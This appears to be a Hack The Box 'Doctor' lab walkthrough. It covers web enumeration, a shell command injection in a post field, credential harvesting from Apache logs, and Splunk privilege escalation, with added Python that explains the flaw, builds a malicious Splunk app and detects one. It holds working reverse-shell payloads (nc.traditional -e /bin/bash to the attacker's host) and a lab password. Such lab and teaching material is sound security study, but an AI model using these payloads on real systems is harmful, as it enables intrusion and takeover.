# Hack The Box - Doctor Walkthrough without Metasploit

![Doctor](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlSi73pfLwmazwc3R2%2F-MSlTlBaQ_6FNHSZmjVF%2Fimage.png?alt=media\&token=71d335a5-2ad7-4759-ab4c-46347c60128a)

## Enumeration

We start by running the nmapAutomator script against the target:

```
./nmapAutomator.sh 10.10.10.209 All
```

The Basic Nmap Scan returns the following:

![Nmap Basic Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSlchvkKccC6yvCaDHf%2Fimage.png?alt=media\&token=f472b841-6849-4c63-82fa-f5e9b33b6a93)

### Ports

We have the following ports open:

**22, 80, 8089**

#### **22**

This is the SSH (Secure Shell) port. We might be able to use it later to log in, if we find a valid username together with its password or its RSA key.

#### 80

This is the Hypertext Transfer Protocol (HTTP) port, and as always when we find an HTTP port, we run Gobuster against it:

```
gobuster dir -u http://10.10.10.209 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -e
```

![Gobuster First Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSltpSYogx3hi_Txp8o%2Fimage.png?alt=media\&token=cad3173f-903e-45dc-b7cd-f486fdeab836)

We don't find much, but if we browse the site itself and do some manual recon, we see a domain name:

![doctors.htb](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSluMI6kdoTSjk-ktHj%2Fimage.png?alt=media\&token=30ce9940-eda5-4676-917d-cafb48a6d3f7)

Let's add **doctors.htb** to our /etc/hosts and run the same Gobuster scan again against that virtual host:

```
gobuster dir -u http://doctors.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -e
```

![Gobuster Second Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSludqkV-DR4iXY6bA0%2Fimage.png?alt=media\&token=92fe338d-fd28-47d2-94f3-8219a5ee1b85)

This time we find some very interesting results, among them **login**:

![Login page](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSlxJD1AQruxg2dahyy%2Fimage.png?alt=media\&token=8b04ca5a-cc95-4e60-bebc-1f7c369f17ae)

We don't have any credentials to log in with yet, but the Doctor Secure Messaging page lets us register an account.

![Registering](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSlxnTt7WpGcjwLoRLS%2Fimage.png?alt=media\&token=e9d2c9e6-a495-401a-8148-57c17a26a9d5)

Now that we are registered, we can log in with our e-mail and password:

![Login in](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSlyA7N01fi4fCMHia1%2Fimage.png?alt=media\&token=2fba3072-45dd-4eda-ae40-69b97ccc1aa8)

Once we are in, we can see two things: our profile, and **Posts**:

![New Posts](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSlzTPMMifEwY6YnuW_%2Fimage.png?alt=media\&token=5feb8c21-f1f8-402c-bac0-0fdbec9c6cbd)

We create a test post with "test" as both title and content:

![Test post](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSm-CvcB8qDN_OEy13D%2Fimage.png?alt=media\&token=cee2ad7d-8aee-4a86-8631-d5ae505d3886)

Now let's intercept it with Burp and see if we can play with a post creation:

![Intercepting](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSlbu2QwjMlFyGVvpP5%2F-MSm0voK75hSAsUoXZ0v%2Fimage.png?alt=media\&token=92f57617-4fb2-4448-a958-e6ccda5ae388)

We intercept the request and send it to Repeater so we can start testing the **title** and **content** fields.

## **Exploitation**

We are going to try to exploit either title or content in order to gain access to the box.

### Foothold

Since we have both title and content to play with, we start by putting a URL that points at our own machine in the content, to see whether the server fetches it:

First, we start an HTTP server on our Kali box (on Python 3 the equivalent is `python3 -m http.server 80`):

```
python -m SimpleHTTPServer 80
```

![wget request](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSm18h6qbj7Neyi_LNZ%2F-MSm2_kEL3XxyKseSexP%2Fimage.png?alt=media\&token=9ed4b020-5a39-4bf1-95bf-187d5f86824d)

We put a plain URL to a test file on our server in the content field and, to our surprise, the request shows up in our HTTP server log: something on the backend fetches every link it finds in a post. If that fetch is a shell command built from our URL, a `$(...)` command substitution inside the URL will be evaluated by the shell before the download is even attempted, so what else can we make it run?

After playing with some bash payloads and plain `nc`, we settle on nc.traditional, the Debian/Ubuntu name for the classic netcat that still supports `-e`:

```
wget http://<your-ip>/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'<your-ip>'$IFS'<port>')
```

`$IFS` is the shell's Internal Field Separator; unquoted, it expands to whitespace, so it lets us separate the command from its arguments without typing a literal space, which would otherwise end the URL. The closing parenthesis matters: it terminates the `$(...)` command substitution.

![Reverse Shell Method 1](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSm18h6qbj7Neyi_LNZ%2F-MSm6-CUp9-8V7VcQ9ZW%2Fimage.png?alt=media\&token=2227e087-9a7e-4966-a20b-3e252de364db)

We could also gain a reverse shell with:

```
curl http://<your-ip>/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'<your-ip>'$IFS'<port>')
```

or with the URL inside an image tag:

```
<img src="http://<your-ip>/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'<your-ip>'$IFS'<port>')"/>
```
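To make clear why the `$(...)` and `$IFS` trick works, here is an added example (written for this walkthrough, not the box's own backend code, whose source we never see) of a hypothetical link checker in the two shapes it can take: one that splices the URL into a shell command string, and one that passes it as a single argv element without a shell. `echo` stands in for curl/wget and `printf` for nc.traditional, so the demo runs offline and harmlessly; the post body and the IP are constructed.

```python
import re
import subprocess
from urllib.parse import urlsplit

# Constructed post body modelled on the payload above. "printf" stands in for
# nc.traditional: if the shell performs the $(...) substitution, the word
# "injected" appears in the URL the fetcher receives.
POST_CONTENT = "have a look at http://10.10.14.5/$(printf$IFS'injected') thanks"

URL_RE = re.compile(r"https?://\S+")


def extract_urls(content):
    """Pull every http(s) URL out of a post, the way a link checker might."""
    return URL_RE.findall(content)


def fetch_vulnerable(url):
    """Hypothetical link checker that splices the URL into a shell command
    string. /bin/sh expands $(...) and $IFS before the program ever sees its
    argument, so the substitution runs with the web app's privileges."""
    proc = subprocess.run("echo " + url, shell=True,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def is_plain_http_url(url):
    """Allow-list check: http(s) scheme and a host made only of
    [A-Za-z0-9.-] with an optional port. It does not try to sanitise the
    path; with an argv list the path is inert anyway, so this is defence
    in depth against whatever else consumes the URL."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and \
        re.fullmatch(r"[A-Za-z0-9.-]+(:\d+)?", parts.netloc or "") is not None


def fetch_hardened(url):
    """Same check without a shell: argv list, so $(...) is just bytes.
    Returns None for URLs that fail validation instead of running anything."""
    if not is_plain_http_url(url):
        return None
    proc = subprocess.run(["echo", url], capture_output=True, text=True)
    return proc.stdout.strip()


def check_post(content, fetcher):
    """Run the given fetcher over every URL in a post and return what the
    fetched command actually received."""
    return [fetcher(u) for u in extract_urls(content)]


if __name__ == "__main__":
    print("vulnerable:", check_post(POST_CONTENT, fetch_vulnerable))
    print("hardened:  ", check_post(POST_CONTENT, fetch_hardened))
```

The vulnerable path prints `http://10.10.14.5/injected`: the shell has already run `printf injected` and spliced its output into the argument. The hardened path prints the URL verbatim, `$(...)` and all, because no shell ever parses it.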

Now we upgrade our shell to a TTY shell with Python:

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

![upgrading shell](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSm18h6qbj7Neyi_LNZ%2F-MSm8PVLMOfEW4cl9nEe%2Fimage.png?alt=media\&token=fbfa8a7f-3eee-451e-83f2-0ec606f85c93)

## Internal Enumeration

As soon as we get in, we see that we belong to an interesting group, **adm**:

![id](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmI9tSpZOGy9Q6rdBj%2Fimage.png?alt=media\&token=b0e60215-3571-4614-a521-bac5452d6ef8)

We can see there are two users in /home:

![Home Users](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmK9xOxu3jigPI2Y8y%2Fimage.png?alt=media\&token=4a72eec6-9b20-4c9d-a791-6c26509e0f11)

So our primary target now is **Shaun**. Since we belong to the adm group, we can read the apache2 logs under /var/log/apache2:

![Apache2 logs](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmL0thobZBPRJgcm5R%2Fimage.png?alt=media\&token=818908ee-12bb-42f6-aa10-886af7eee66f)

Let's see if there's any password we can grab from there:

```
grep -ri password /var/log/apache2/
```

Among all the noise our Gobuster scans left in the logs (hehe), we find something interesting:

![Possible Password](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmM4g9npeh66lKJJxq%2Fimage.png?alt=media\&token=cb655eb0-6e81-40c5-9471-db3f38456562)
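A `grep` for the word password is the quick way, but the same hunt can be done systematically. The following is an added example for this walkthrough (not the box's code): it parses Apache combined-format access log lines, drops scanner noise by status code, and flags requests whose query string carries a credential-like parameter or any parameter on a credential-handling path, which is exactly how a password typed into the wrong field (here the e-mail field of a reset form) ends up in a GET/POST target line. The log lines, IPs and timestamps are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache "combined" log lines modelled on what the grep turns up:
# gobuster noise (404s), a normal login POST, and a password reset request
# where a user typed their password into the e-mail field. Sample data only.
SAMPLE_LOG = """\
10.10.14.5 - - [05/Sep/2020:11:17:30 +0200] "GET /passwords HTTP/1.1" 404 453 "-" "gobuster/3.1.0"
10.10.14.5 - - [05/Sep/2020:11:17:31 +0200] "GET /password.txt HTTP/1.1" 404 453 "-" "gobuster/3.1.0"
10.10.14.5 - - [05/Sep/2020:11:17:32 +0200] "POST /login HTTP/1.1" 302 209 "http://doctors.htb/login" "Mozilla/5.0"
10.10.14.4 - - [05/Sep/2020:11:17:34 +0200] "POST /reset_password?email=Guitar123 HTTP/1.1" 500 453 "http://doctors.htb/reset_password" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Parameter names worth a second look, and path fragments that hint at
# credential handling (login, reset and change-password forms).
CRED_PARAMS = {"password", "passwd", "pass", "pwd", "secret", "token", "key"}
CRED_PATHS = ("password", "passwd", "login", "reset", "credential")


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def credential_hits(log_text, skip_statuses=("404",)):
    """Return entries where a secret may have been written to the access log:
    any query-string parameter with a credential-like name, or any parameter
    at all on a credential-handling path (that catches the wrong-field case).
    Requests whose status is in skip_statuses (scanner noise) are ignored."""
    hits = []
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if not entry or entry["status"] in skip_statuses:
            continue
        parts = urlsplit(entry["target"])
        params = parse_qsl(parts.query, keep_blank_values=True)
        if not params:
            continue
        path_l = unquote(parts.path).lower()
        on_cred_path = any(p in path_l for p in CRED_PATHS)
        suspicious = [(k, v) for k, v in params
                      if k.lower() in CRED_PARAMS or on_cred_path]
        if suspicious:
            hits.append({
                "ip": entry["ip"],
                "method": entry["method"],
                "path": parts.path,
                "params": suspicious,
                "status": entry["status"],
            })
    return hits


if __name__ == "__main__":
    for hit in credential_hits(SAMPLE_LOG):
        print(hit)
```

On the sample data this reports a single hit, the `/reset_password` request with `email=Guitar123`, and the POST to `/login` is not reported because its credentials travelled in the body, which Apache does not log; the 404s from Gobuster are filtered out before any parsing.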

Since we found a possible password, the first thing to do is password spraying: try that one password against every local user.

![Shaun User](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmMeDXyNcgbWq5unHO%2Fimage.png?alt=media\&token=21758209-08f8-4015-a775-04a337e0a1a4)

We tried root first (you never know...) but it was not that easy; it works for **Shaun** instead. We can grab our user flag from his home directory.

## Privilege Escalation

At the start of the enumeration we saw another open port, 8089, with **Splunk** (the splunkd management interface) running on it. A quick Google search turns up a privilege escalation script for it, SplunkWhisperer2, which abuses a legitimate feature: an authenticated user can deploy a Splunk app containing a scripted input, and splunkd executes that script with its own privileges, root on this box:

{% embed url="<https://github.com/cnotin/SplunkWhisperer2>" %}

### Remote Privilege Escalation

Since port 8089 is reachable from our machine, we can use the remote version of the script with Shaun's credentials; it serves a malicious app from our host, tells splunkd to install it, and splunkd runs our payload:

```
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost <your-ip> --username shaun --password Guitar123 --payload "nc.traditional -e /bin/bash '<your-ip>' '<port>'"
```

![Remote Exploit](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmT19NjwN7SgF36RY1%2Fimage.png?alt=media\&token=dd1b3c7d-ab02-4537-949f-1b24725832fc)

### Internal Privilege Escalation

In case we could not reach port 8089 from our machine, we can still escalate privileges with the local version of the script (PySplunkWhisperer2_local.py), run from our shell as Shaun. It doesn't work out of the box: the victim only has python3 and the script was written for python2, as the `raw_input()` calls and the `print` statements without parentheses show, so we have to change:

**raw\_input()** --> **input()**

and wrap the argument of every **print** statement in **()** (or let `2to3 -w` make both changes for us).

Once those changes are made it works like a charm and sends us a reverse shell:

![Local Exploit](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmV1l6ZRcgewkrt4qN%2Fimage.png?alt=media\&token=97b3e400-9200-4e70-9a83-f4c7f2d62b47)
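Both the remote and the local method end up deploying the same thing: a Splunk app whose `default/inputs.conf` declares a scripted input, so splunkd runs `bin/<script>` on a timer. The following added example (written for this walkthrough; it is not SplunkWhisperer2's own code, and the app name, script name, interval and addresses are arbitrary choices) builds such a bundle in memory using the same nc.traditional payload as above, and then does the defender's half of the job: unpacks a bundle and lists every scripted input with the script body it would execute, the check you would run over `$SPLUNK_HOME/etc/apps` after an incident like this.

```python
import configparser
import io
import tarfile

# Illustration of the mechanism SplunkWhisperer2 relies on, written for this
# walkthrough; not the tool's own code. Names below are arbitrary.
APP_NAME = "pe_demo"
SCRIPT_NAME = "pe.sh"


def reverse_shell_script(lhost, lport):
    """Payload splunkd will run: the same nc.traditional call used above."""
    return ("#!/bin/sh\n"
            f"nc.traditional -e /bin/bash '{lhost}' '{lport}'\n")


def inputs_conf(script_name, interval=10):
    """Scripted input stanza: splunkd runs bin/<script> every <interval>
    seconds as the user splunkd itself runs as (root on this box)."""
    return (f"[script://./bin/{script_name}]\n"
            f"interval = {interval}\n"
            "disabled = 0\n"
            "sourcetype = pe_demo\n")


def build_app(app_name, script_text, conf_text):
    """Pack the app in the layout Splunk expects: <app>/bin/<script>
    (executable) and <app>/default/inputs.conf. Returns tar.gz bytes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        def add(path, text, mode):
            data = text.encode()
            info = tarfile.TarInfo(path)
            info.size = len(data)
            info.mode = mode
            tar.addfile(info, io.BytesIO(data))
        add(f"{app_name}/bin/{SCRIPT_NAME}", script_text, 0o755)
        add(f"{app_name}/default/inputs.conf", conf_text, 0o644)
    return buf.getvalue()


def scripted_inputs(archive_bytes):
    """Defender side: list every scripted input in an app bundle with its
    interval, disabled flag and the script body it would execute."""
    found = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        members = {m.name: m for m in tar.getmembers()}
        for name, member in members.items():
            if not name.endswith("/default/inputs.conf"):
                continue
            app = name.split("/")[0]
            cp = configparser.ConfigParser(interpolation=None)
            cp.read_string(tar.extractfile(member).read().decode())
            for section in cp.sections():
                if not section.startswith("script://"):
                    continue
                rel = section[len("script://"):]
                # "./bin/x" is relative to the app directory.
                script_path = f"{app}/{rel[2:]}" if rel.startswith("./") else rel
                body = ""
                if script_path in members:
                    body = tar.extractfile(members[script_path]).read().decode()
                found.append({
                    "app": app,
                    "script": script_path,
                    "interval": cp[section].get("interval"),
                    "disabled": cp[section].get("disabled"),
                    "body": body,
                })
    return found


if __name__ == "__main__":
    bundle = build_app(APP_NAME, reverse_shell_script("10.10.14.5", "4444"),
                       inputs_conf(SCRIPT_NAME))
    for item in scripted_inputs(bundle):
        print(item)
```

Any scripted input whose body you do not recognise, or whose app appeared around the time of the compromise, is the artefact to look for; the same parser works on a directory listing of installed apps if you swap the tar reading for plain file reads.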

## Pwnd

We can grab our root flag:

![Pwned](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MSmHxzEzGC9JVtkSb81%2F-MSmVMUDohSVmNtFRdof%2Fimage.png?alt=media\&token=0eb662e3-e7e8-4d74-97ce-0d9e29d2bced)


